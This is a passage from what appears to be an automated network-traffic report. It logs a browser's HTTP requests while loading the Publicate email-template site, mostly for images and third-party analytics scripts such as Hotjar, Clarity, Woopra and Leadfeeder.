        Source: global trafficHTTP traffic detected: GET /alvis-onboard-1.0.8.js HTTP/1.1Host: assets.getalvis.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /track/ce/?project=publicate.it&instance=woopra&meta=&screen=1280x1024&language=en-US&app=js-client&referer=&cookie=sB4hScRiWkjO&event=pv&timeout=600000&idptnc=eNCnXL5OXflh&ce_campaign_name=powered_by_publicate&ce_campaign_medium=referral&ce_campaign_source=publicate_user_exported_emails&ce_url=%2F%3Futm_source%3Dpublicate_user_exported_emails%26utm_medium%3Dreferral%26utm_campaign%3Dpowered_by_publicate&ce_title=Publicate%20%7C%20HTML%20Email%20Template%20Builder&ce_domain=publicate.it&ce_uri=https%3A%2F%2Fpublicate.it%2F%3Futm_source%3Dpublicate_user_exported_emails%26utm_medium%3Dreferral%26utm_campaign%3Dpowered_by_publicate&ce_scroll%20depth=0.17704470037087644&ce_returning=false HTTP/1.1Host: www.woopra.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /images/template3-p-500.png HTTP/1.1Host: publicate.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicateAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0
        Source: global trafficHTTP traffic detected: GET /js/jquery-3.5.1.min.dc5e7f18c8.js?site=5e9170ba37cf8dfae03ae1a4 HTTP/1.1Host: d3e54v103j8qbb.cloudfront.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /images/template4-p-500.png HTTP/1.1Host: publicate.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicateAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0
        Source: global trafficHTTP traffic detected: GET /images/template5-p-500.png HTTP/1.1Host: publicate.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicateAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0
        Source: global trafficHTTP traffic detected: GET /?sid=bElvO73dOjE4ZMqj&data=eyJnYVRyYWNraW5nSWRzIjpbIlVBLTUyNTk3MDkwLTEiXSwiZ2FNZWFzdXJlbWVudElkcyI6W10sImdhQ2xpZW50SWRzIjpbIjEzODE2ODA2MDYuMTcyNTAzNDU3OSJdLCJjb250ZXh0Ijp7ImxpYnJhcnkiOnsibmFtZSI6ImxmdHJhY2tlciIsInZlcnNpb24iOiIyLjY0LjAifSwicGFnZVVybCI6Imh0dHBzOi8vcHVibGljYXRlLml0Lz91dG1fc291cmNlPXB1YmxpY2F0ZV91c2VyX2V4cG9ydGVkX2VtYWlscyZ1dG1fbWVkaXVtPXJlZmVycmFsJnV0bV9jYW1wYWlnbj1wb3dlcmVkX2J5X3B1YmxpY2F0ZSIsInBhZ2VUaXRsZSI6IlB1YmxpY2F0ZSB8IEhUTUwgRW1haWwgVGVtcGxhdGUgQnVpbGRlciIsInJlZmVycmVyIjoiIn0sImV2ZW50IjoidHJhY2tpbmctZXZlbnQiLCJjbGllbnRFdmVudElkIjoiNjhjYmY1NTkyMTJlYjkyNyIsInNjcmlwdElkIjoiYkVsdk83M2RPakU0Wk1xaiIsImNvb2tpZXNFbmFibGVkIjp0cnVlLCJjb25zZW50TGV2ZWwiOiJub25lIiwiYW5vbnltaXplSXAiOmZhbHNlLCJsZkNsaWVudElkIjoiTEYxLjEuZWQxZTM0NDk3OGE2NTFjNy4xNzI1MDM0NTc5Njk4IiwiZm9yZWlnbkNvb2tpZXMiOltdLCJwcm9wZXJ0aWVzIjp7fSwiYXV0b1RyYWNraW5nRW5hYmxlZCI6dHJ1ZSwiYXV0b1RyYWNraW5nTW9kZSI6Im9uX3NjcmlwdF9sb2FkIn0= HTTP/1.1Host: tr-rc.lfeeder.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /lftracker_v1_bElvO73dOjE4ZMqj.js HTTP/1.1Host: sc.lfeeder.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /c/hotjar-2431713.js?sv=7 HTTP/1.1Host: static.hotjar.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /modules.8da33a8f469c3b5ffcec.js HTTP/1.1Host: script.hotjar.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://publicate.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /s/0.7.45/clarity.js HTTP/1.1Host: www.clarity.msConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://publicate.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CLID=c33b4f75fae844d6b05821f811173c55.20240830.20250830
        Source: global trafficHTTP traffic detected: GET /images/nhph2-p-500.jpg HTTP/1.1Host: publicate.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0
        Source: global trafficHTTP traffic detected: GET /images/nhph1-p-500.jpg HTTP/1.1Host: publicate.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0
        Source: global trafficHTTP traffic detected: GET /images/nhph3-p-500.jpg HTTP/1.1Host: publicate.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0
        Source: global trafficHTTP traffic detected: GET /images/nhph4-p-500.jpg HTTP/1.1Host: publicate.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0
        Source: global trafficHTTP traffic detected: GET /images/gmail_client.svg HTTP/1.1Host: publicate.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0
        Source: global trafficHTTP traffic detected: GET /images/outlook_client.svg HTTP/1.1Host: publicate.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0
        Source: global trafficHTTP traffic detected: GET /tag/kuemlmuzvn?ref=gtm2 HTTP/1.1Host: www.clarity.msConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CLID=c33b4f75fae844d6b05821f811173c55.20240830.20250830
        Source: global trafficHTTP traffic detected: GET /images/mailchimp_client.svg HTTP/1.1Host: publicate.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0
        Source: global trafficHTTP traffic detected: GET /images/yahoo_client.svg HTTP/1.1Host: publicate.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0
        Source: global trafficHTTP traffic detected: GET /images/macOS_client.svg HTTP/1.1Host: publicate.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0
        Source: global trafficHTTP traffic detected: GET /images/hubspot_client.svg HTTP/1.1Host: publicate.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0
        Source: global trafficHTTP traffic detected: GET /images/send_client.svg HTTP/1.1Host: publicate.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0
        Source: global trafficHTTP traffic detected: GET /images/features_review_icon.png HTTP/1.1Host: publicate.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0
        Source: global trafficHTTP traffic detected: GET /js/profitwell.js?auth=c61691493c428b337ecf0f72fa2f9c82 HTTP/1.1Host: public.profitwell.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /images/more_clients.svg HTTP/1.1Host: publicate.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0
        Source: global trafficHTTP traffic detected: GET /images/adobe_review.png HTTP/1.1Host: publicate.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0
        Source: global trafficHTTP traffic detected: GET /images/Trustpilot_logo.png HTTP/1.1Host: publicate.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0
        Source: global trafficHTTP traffic detected: GET /images/template1-p-500.png HTTP/1.1Host: publicate.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0; _clck=137ejx4%7C2%7Cfor%7C0%7C1703
        Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=kMW+XwGzpduof8w&MD=2eL+Va3Y HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
        Source: global trafficHTTP traffic detected: GET /images/template2-p-500.png HTTP/1.1Host: publicate.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0; _clck=137ejx4%7C2%7Cfor%7C0%7C1703
        Source: global trafficHTTP traffic detected: GET /s/0.7.45/clarity.js HTTP/1.1Host: www.clarity.msConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CLID=c33b4f75fae844d6b05821f811173c55.20240830.20250830
        Source: global trafficHTTP traffic detected: GET /images/favicon.png HTTP/1.1Host: publicate.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicateAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; 